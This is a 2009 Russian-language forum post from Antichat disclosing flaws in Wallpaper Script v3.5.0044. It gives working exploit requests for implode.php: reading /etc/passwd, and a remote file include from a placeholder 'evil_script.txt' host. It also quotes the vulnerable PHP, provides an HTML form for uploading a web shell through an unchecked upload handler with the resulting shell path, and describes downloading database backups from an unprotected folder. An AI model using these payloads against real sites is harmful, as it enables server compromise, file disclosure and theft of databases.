ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Wallpaper Script v3.5.0044
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Wallpaper Script v3.5.0044
  #1  
Старый 24.03.2009, 04:14
Аватар для BlackSun
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию Wallpaper Script v3.5.0044
Wallpaper Script
Версия: v3.5.0044
Оффсайт: http://wallpaperscript.com/
Скачать: http://www.nakido.com/E17B58411BA3FC6456F179825967F1B84174FDF1

Удаленный инсклуд \ Локальный инсклуд (только .php файлов) \ Файловое чтение
Уязвимый скрипт: implode.php
Запрос:
http://localhost/wps//implode.php?files=/etc/passwd
http://localhost/wps//implode.php?files=http://google.com/evil_script.txt?some_param=&.php
Уязвимый кусок кода:
PHP код:
<?php
$GLOBALS['NO_TIMESTAMP'] = true;
include "config.php";
..................
$arr_files explode(","$_REQUEST["files"]);

for ($i=0;$i<count($arr_files);$i++)
{
    $ext explode("."$arr_files[$i]);
    
    if ($ext[count($ext)-1]=="php")
    {
        include $arr_files[$i];
    }
    else
    {
        $file file_get_contents($arr_files[$i]);
        echo $file.";";
    }
}
?>
Заливка шелла с помошью корявого аплоадера
PHP код:
<?php
    include "config.php";
    if ($_SESSION["user_id"]!="")
    {
        
    }
    else
    {
        echo $LANG->l('You dont have rights to make uploads');
        exit(0);
    }

    if (!isset($_FILES["Filedata"]) || !is_uploaded_file($_FILES["Filedata"]["tmp_name"]) || $_FILES["Filedata"]["error"] != 0) {
        echo $LANG->l('There was a problem with the upload');
        exit(0);
    } else {
        
        
        if (move_uploaded_file($_FILES["Filedata"]["tmp_name"], LOCAL_PATH."temp_upload/".$_SESSION["user_id"]."_".$_FILES["Filedata"]["name"]) )
        {
            echo $_SESSION["user_id"]."_".$_FILES["Filedata"]["name"];
        }
        else
        {
            echo $LANG->l('Error uploading the file.');
        }
            
        
    }
?>
Скрипт не делает никаких проверок и залить шелл можно с помошью этой не хитрой формы -
Код:
<form action="temp_upload_wallpaper.php" method="post" enctype="multipart/form-data">
	<input name="Filedata" type="file" /><input type="submit">
</form>
Шелл будет в /temp_upload/{твой айди}_{имя файла}

Так же каталог db_backup не закрыт хатачем, при наличии бэкапов БД - их можно слить (имеют вид DB_NAME ."-" . date("Y-m-d-H-i-s") . '.sql')
Последний раз редактировалось BlackSun; 24.03.2009 в 04:19..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
mirc: Invite script by elimS elimS2 PHP, PERL, MySQL, JavaScript 9 21.05.2009 06:58
Куча скриптов =)) SK | Heaton PHP, PERL, MySQL, JavaScript 37 01.02.2008 15:23
Pубрика "Полезные решения на PHP" Utochka PHP, PERL, MySQL, JavaScript 28 23.05.2006 10:06
Google Reader "preview" and "lens" script improper feed validation NeMiNeM Forum for discussion of ANTICHAT 0 09.04.2006 19:20
Новый Мултиплеер для GTA:VC - vc-mp xSp1D3R Болталка 5 16.08.2005 02:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ